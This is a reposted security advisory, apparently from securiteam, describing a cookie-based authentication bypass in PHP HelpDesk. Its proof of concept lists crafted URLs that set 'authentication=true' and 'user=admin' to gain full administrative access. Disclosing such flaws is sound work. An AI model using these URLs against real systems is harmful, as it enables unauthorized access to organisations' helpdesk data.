[转载]PHP HelpDesk验证绕过漏洞以及测试方法

信息来源：www.securiteam.com

Summary
PHP Helpdesk is "a tool that allows administrators to handle tasks related to their organisation. This tool is used to record and monitor the progress of tasks assigned to people. This is an excellent and simple tool for handling tasks". PHP Helpdesk has a fault in the implementation of the cookie values set. Using crafted URL's it is possible to get full access to the system.

Credit:
The information has been provided by Garry Taylor.

Details
Proof of Concept:
Access a site that holds the login to PHP HelpDesk
http://www.target.com/helpdesk/index.php

Change the system so that you are authenticated
http://www.target.com/helpdesk/index.php?authentication=true

Up you privileges to admin
http://www.target.com/helpdesk/i ... true&user=admin